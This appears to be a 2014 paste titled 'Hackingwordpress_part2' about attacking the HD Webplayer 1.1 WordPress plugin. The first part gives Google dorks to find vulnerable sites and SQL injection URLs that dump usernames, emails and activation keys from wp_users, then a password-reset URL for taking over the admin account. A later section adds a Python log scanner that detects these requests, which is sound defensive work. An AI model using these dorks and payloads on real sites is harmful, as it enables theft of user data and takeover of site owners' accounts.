insaneisnotfree

Hackingwordpress_part2

Jul 24th, 2014
===============================================================================================
= SQL Injection: WordPress HD Webplayer – Version 1.1 =
= =
===============================================================================================
METHOD 1 "Dork's"
===============================================================================================
#DORK 1
inurl:/wp-content/plugins/hd-webplayer/playlist.php?videoid=

#DORK 2
HD_Webplayer_Commercial_Key logo.jpg topleft 50 http

===============================================================================================
METHOD 2 "Dork's"
===============================================================================================
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"
===============================================================================================
METHOD 1
===============================================================================================
1 : playlist.php?videoid=2+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_email,0x3b),2,3,4,5,6,7,8,9,10,11+from+wp_users
===============================================================================================
2 : /*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3b),2,3,4,5,6,7,8,9,10,11 from wp_users
===============================================================================================
3 : wp-login.php?action=rp&key=KEY&login=admin
===============================================================================================
METHOD 2
===============================================================================================
1 : http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
===============================================================================================
2 : http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
===============================================================================================
3 : wp-login.php?action=rp&key=KEY&login=admin
===============================================================================================
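For defenders, the request sequence above leaves a recognisable trail in web server access logs. The following is an added detection example, not part of the original paste: it flags UNION SELECT in the `videoid` and `id` parameters of the plugin scripts named in the dorks, including the `/*!...*/` comment-wrapped form, and then reports `action=rp` requests from the same client. The combined log format, the sample lines and the addresses are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined log format). The addresses are
# documentation ranges and the key is a placeholder, not real indicators.
SAMPLE_LOG = """\
203.0.113.7 - - [24/Jul/2014:10:00:01 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=2 HTTP/1.1" 200 512
198.51.100.9 - - [24/Jul/2014:10:00:05 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=2+/*!UNION*/+/*!SELECT*/+1,2,3 HTTP/1.1" 200 734
198.51.100.9 - - [24/Jul/2014:10:00:09 +0000] "GET /wp-content/plugins/hd-webplayer/config.php?id=-3%20UNION%20SELECT%201,2 HTTP/1.1" 200 690
198.51.100.9 - - [24/Jul/2014:10:01:30 +0000] "GET /wp-login.php?action=rp&key=PLACEHOLDER&login=admin HTTP/1.1" 200 2048
203.0.113.7 - - [24/Jul/2014:10:02:00 +0000] "GET /wp-login.php?action=rp&key=PLACEHOLDER&login=alice HTTP/1.1" 200 2048
"""

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" \d{3}')
PLUGIN = "/wp-content/plugins/hd-webplayer/"
WATCHED = {"playlist.php": "videoid", "config.php": "id"}  # script -> parameter
UNION_SELECT = re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)

def normalize(value):
    """Unwrap MySQL /*!...*/ comments and drop plain ones so keywords line up."""
    value = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", value, flags=re.S)
    return re.sub(r"/\*.*?\*/", " ", value, flags=re.S)

def scan(log_text):
    """Return (hits, followups): flagged plugin requests, then reset-link
    requests (action=rp) made later by a client that was already flagged."""
    hits, followups, suspects = [], [], set()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        params = dict(parse_qsl(url.query))  # decodes '+' and %xx
        if url.path.startswith(PLUGIN):
            param = WATCHED.get(url.path.rsplit("/", 1)[-1])
            if param and UNION_SELECT.search(normalize(params.get(param, ""))):
                hits.append((ip, url.path))
                suspects.add(ip)
        elif url.path.endswith("/wp-login.php") and params.get("action") == "rp":
            if ip in suspects:
                followups.append((ip, params.get("login")))
    return hits, followups

if __name__ == "__main__":
    for result in scan(SAMPLE_LOG):
        print(result)
```

A follow-up entry means a client that probed the plugin later requested a password-reset link, so the named account's `user_activation_key` should be treated as exposed.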